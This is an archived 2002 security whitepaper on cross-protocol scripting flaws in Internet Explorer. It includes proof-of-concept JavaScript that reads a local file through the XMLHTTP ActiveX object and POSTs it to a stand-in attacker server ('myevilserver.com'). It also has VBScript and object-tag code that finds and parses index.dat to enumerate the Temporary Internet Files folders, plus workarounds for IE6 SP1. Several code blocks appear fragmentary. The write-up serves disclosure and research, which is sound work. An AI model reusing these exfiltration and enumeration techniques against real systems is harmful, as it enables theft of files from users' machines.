TUCoPS :: Browsers :: expl5687.htm

Internet Explorer Leveraging cross-protocol scripting in MSInternet Explorer whitepaper
13th Sep 2002 [SBWID-5687]

		Leveraging cross-protocol scriptinh in MSIE whitepaper


		All IE ?


		From jelmer [jkuperus@xs4all.nl] whitepaper :





		The past year we have seen a great number  of  Cross-protocol  scripting
		bugs found in internet explorer  Generally  the  dangers  attributed  to
		these kind of bugs have been.

		- cookie theft

		- executing programs installed on a users pc  already  (without  passing

		- website foring

		- reading files from a users harddisk that can be opened in msie (  txt,
		htm etc..)

		I've allways felt that researchers where  ignoring  what  was  right  in
		front of them. In this post I will outline that it  is  infact  possible
		to read and send binary  files  and  enumerate  the  randomly  generated
		temporary internet files folders (TIF) with all asociated risks

		in the past it has been possible to  use  this  information  to  execute
		arbitrary code by firing a chm (html help file) from the TIF  containing
		malicious code. Eventhough I have been told this has been  corrected  in
		MSIE6 SP1 I feel this is an accident waiting to happen. But even  if  it
		wont allow execution there is a lot of stuff you can do with this

		For instance what almost certainly be can be  done  is  call  an  applet
		from the tif that can chart the local directory stucture on  a  pc  thus
		downloading binary files is no longer "blind"

		To prove my points I have prepared a demonstration at



		that uses the bug posted by greymagic  software  to  enumerate  the  tif

		ok now the techincals


		 Reading binary files



		recent versions of internet explorer  ship  with  an  activeX  component
		called the XMLHTTPConnection object In a very simple  sense,  it  allows
		one to open an HTTP connection to a server,  send  some  data,  and  get
		some data back, all  in  a  few  lines  of  script  or  code.  The  data
		exchanged through the XMLHTTP object is usually XML, but this is  not  a

		When used in the internet zone you are resticted to reading and  posting
		to urls from the domain the  code  is  called  from.  In  the  localzone
		however no such restrictions have been implemented so by  injecting  the
		following code into the localzone

		<script language="javascript">


		        var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");

		        xmlhttp.Open("GET", "file:///C:/someFile.bin", false);



		        var targethttp = new ActiveXObject ("Microsoft.XMLHTTP");

		        targethttp.Open("POST","http://www.myevilserver.com/servlet/RecieveServlet", false);





		one can read and send just about any file from the users  filesystem  as
		he xmlhttp.responseBody returns an array of unsigned bytes.


		 Enumerating the TIF paths



		what is the Temporary Internet Files Folder? Just about  Everything  you
		view with your browser gets cached to disk, for  faster  browsing,  that
		way for instance when you press back the browser doesnt have  to  reload
		all the  images  and  text.  being  able  to  store  files  on  a  users
		filesystem on a known location is generally  a  bad  idea  so  microsoft
		generates a number of random filesystem paths  to  store  the  temporary
		content however they wheren't overly clever in designing the system

		on 23 November 2000 george guninski wrote in  an  advisory  relating  to
		the opject tags type handleing:

		<snip> A good way is to  use  the  Temporary  Internet  Files  Folder
		which contain cached documents and files. The problem with it  is  there
		are several subfolders with random names. But there is  a  special  file
		"index.dat"  which  is  something  like  a  catalog  or  registry  which
		contains all visited URLs and which is more important the names  of  the
		random folders in its beginning. It is locatated in

		C:/WINDOWS/Temporary Internet Files/Content.IE5/ 


		under Win9x and in

		C:/Documents and Settings/USERNAME/Local Settings/Temporary Internet Files/Content.IE5/


		under Win2K - so under Win2K the username of the current  user  must  be
		known or guessed which makes things more difficult.




		what this basicly means is that if we can read this  index.dat  file  we
		can enumerate the paths the mentioned  "guessing  of  the  username"  is
		easily cirumvented by an unpatched flaw

		on januari of this year again, george guninski released an  advisory  on
		a problem in the GetObject() function

		on wich the pull replied that it is infact easy to get the path  to  the
		index.dat        file        in        a         similar         fashion
		(http://msgs.securepoint.com/cgi-bin/get/bugtraq0201/1/1.html)  while  i
		believe the directory traversal thing was patched, this way  to  get  to
		the path was never fixed.

		the following code will get the path to the index.dat file, and  open  a
		new window with the follwing URL

		 http://www.xs4all.nl/~jkuperus/paths.htm?file=<PATH TO INDEX.DAT>



		<object classid="clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B" width="0"


		    <PARAM NAME="Location" VALUE="javascript:document.writeln('

		<object classid="clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B" name="o"><PARAM NAME="Location"




		    var matcher = new








		now that we have the path we can pass it to  our  XMLHTTPComponent  wich
		can read and parse the information contained in the file. injecting  the
		following code into the localzone will get this done

		 <script language="vbscript">

		  Sub extractPaths(filename)

		   set xmlHTTP = CreateObject("Microsoft.XMLHTTP")

		   xmlHTTP.open "GET",filename,false


		   contents = xmlHTTP.responseBody

		   for i = 0 to 7

		     folder = ""

		     for j = 81 + (i*12) to 88 + (i*12)

		      thischarcode = ascb(midb(contents,j,1))

		       folder = folder & chr(thischarcode)


		     msgbox mid(filename,1,len(filename)-9) + folder


		  end sub



		I use vbscript  because  I  couldn't  get  the  VT_ARRAY  datatype  that
		responseBody returns to  work  in  javascript.  Maybe  some  guru  could
		expain to me if and how this is done

		Another possible use for this is being able to extract  and  send  small
		portions of larger files.

		I attached a enumeration.htm file that when run in the local  zone  (eg.
		from your disk will list the TIF folders) I have not  had  the  time  to
		update the exploit yet but might do so later.


		<body onload="test()">


		<script language="vbscript">

		 Sub extractPaths(filename)

		  set xmlHTTP = CreateObject("Microsoft.XMLHTTP")

		  xmlHTTP.open "GET",filename,false


		  contents = xmlHTTP.responseBody

		  for i = 0 to 7

		    folder = ""

		    for j = 81 + (i*12) to 88 + (i*12)

		     thischarcode = ascb(midb(contents,j,1))

		      folder = folder & chr(thischarcode)


		    msgbox mid(filename,1,len(filename)-9) + folder


		 end sub




		<script language="javascript">


		 document.writeln('<object id=a

		classid=clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B width=0 height=0>');

		 document.writeln('<PARAM NAME=Location

		VALUE="javascript:document.writeln("<object id=b

		classid=clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B width=0 height=0><PARAM





		 function test() {



		   function () {

		    elb = document.getElementById('b');

		    var matcher = new RegExp('<PARAM.NAME=.Location..VALUE=.*#([^\\"]*).>');














		IE6 SP 1 notes

		SP1 messed things up on a  couple  of  points  so  the  demo  wont  work
		anymore. however all points are still very valid as  all  obstacles  can
		be worked around obstacles encountered where

		-  you arent allowed to open windows to file:// mhtml:// etc resources

		As thor larholm already pointed out redirection will subvert this,  thus
		allowing the grey magic thingie to work once more

		- It isn't possible to  to  obtain  the  windows  username  through  the
		pull's code anymore

		the following however will run when started in the localzone

		 document.writeln('<object id=a classid=clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B width=0 height=0>');

		 document.writeln('<PARAM NAME=Location

		VALUE="javascript:document.writeln("<object id=b

		classid=clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B width=0 height=0><PARAM





		 function test() {


		   function () {

		    elb = document.getElementById('b');

		    var matcher = new RegExp('<PARAM.NAME=.Location..VALUE=.*#([^\\"]*).>');







		there's some wierd stuff going on here basicly IE thinks  VALUE="  stops
		at " ( an encoded " ) and thus  thinks  the  param  is  invalid  so  the
		warning text is not  shown.  the  tag  is  however  still  processed  as
		normal. Oddly however it wont work like this in the internet  zone.  I'd

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